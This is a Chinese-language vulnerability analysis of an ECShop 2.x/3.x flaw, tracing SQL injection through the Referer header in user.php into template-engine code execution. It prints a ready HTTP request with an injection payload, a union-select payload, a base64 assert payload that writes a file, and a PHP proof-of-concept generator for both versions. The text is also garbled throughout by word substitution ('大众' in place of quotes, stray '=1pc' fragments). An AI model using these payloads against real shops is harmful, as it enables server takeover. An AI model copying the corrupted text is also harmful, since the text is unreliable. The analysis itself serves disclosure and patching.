其2017年及以前的版本中, user.php的display函数中,模版变量可控,导致注入,合营注入可达到远程代码实行

0x02 影响范围

ECShop 2.xECShop 3.x0x03 漏洞剖析

ringk3y老哥把这个漏洞剖析的很清晰,全体利用以及绕过的过程非常精彩,感谢分享,也再次感谢p神供应的环境.

SQL注入:

ecshopdwt对应php文件Web运用平安破绽之ECShop2x/3x代码履行剖析 Python

在user.php中

$back_act变量来源于HTTP_REFERER, assign函数用于在模版变量里赋值。

连续跟踪 display函数

读取user_passport.dwt模版文件内容,显示解析变量后的html内容,用_echash做分割,得到$k然后交给isnert_mod处理,由于_echash是默认的,不是随机天生的,以是$val内容可随意掌握。

接着看 insert_mod函数

=1pc这里进行了动态调用,=1pc$val传入进来用|分割,参数传入进来时须要被序列化。

=1pc再看include/lib_insert.php中的insert_ads函数

=1pc

这里直接就能注入了

GET /user.php?act=login HTTP/1.1Accept: /Accept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: IPPragma: no-cacheCookie: PHPSESSID=7dd64ac53c93500b5dff70fdc0163f2e; ECS_ID=057fee67dd00d21af00d81537cb1d09e0946bdec; ECS[visit_times]=2Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"大众num\公众;s:72:\"大众0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\"大众;s:2:\"大众id\"大众;i:1;}Connection: close

代码实行:

连续看fetch函数

追踪_eval函数

$position_style变量来源于数据库中的查询构造

然后我们连续布局SQL注入,由于这段sql操作 order by部分换行了截断不了 以是须要在id处布局注释来合营num进行union查询

payload:

SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecshop27`.`ecs_ad` AS a LEFT JOIN `ecshop27`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1535678679' AND end_time &gt;= '1535678679' AND a.position_id = ''/' ORDER BY rnd LIMIT / union select 1,2,3,4,5,6,7,8,9,10-- -

函数中有一个判断:

=1pc我们 id传入’/

=1pcnum传入/ union select 1,0x272f2a,3,4,5,6,7,8,9,10– -就能绕过了

var_dump()一下

再看fetch函数,传入的参数被fetch_str函数处理了

追踪fetch_str函数,这里的字符串处理流程比较繁芜

return preg_replace(\公众/{([^\}\{\n])}/e\公众, \"大众\$this->select('\\1');\公众, $source);

这一行意思是比如$source是xxxx{$asd}xxx,那么经由这行代码处理后便是返回this->select(‘$asd’)的结果, 看看select函数:

第一个字符为$时进入$this->get_val函数

我们$val没有.$又进入make_var函数

末了这里引入单引号从变量中逃逸, 我们要闭合_var以是终极payload是:

{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEudHh0JywnZ2V0c2hlbGwnKQ=='));//}xxx

在这里P神用php写了一个Poc:这里2.x跟3.x的hash不一样,以是利用的时候须要变动一下:

<?php$shell = bin2hex(\公众{\$asd'];phpinfo\t();//}xxx\"大众);$id = \"大众-1' UNION/\"大众;$arr = [ \"大众num\"大众 => sprintf('/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell), \"大众id\公众 => $id];$s = serialize($arr);$hash3 = '45ea207d7a2b68c49582d2d22adf953a';$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';echo \公众POC for ECShop 2.x: \n\公众;echo \公众{$hash2}ads|{$s}{$hash2}\"大众;echo \"大众\n\nPOC for ECShop 3.x: \n\"大众;echo \"大众{$hash3}ads|{$s}{$hash3}\公众;

把poc放到php环境里运行一下:

2.x实行结果如下 :

3.x 实行结果如下:

0x04 修复建议

最新的3.6.0最新版已经修复完毕,建议升级最新版本!

Reference:

https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.mdhttp://ringk3y.com/2018/08/31/ecshop2-x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/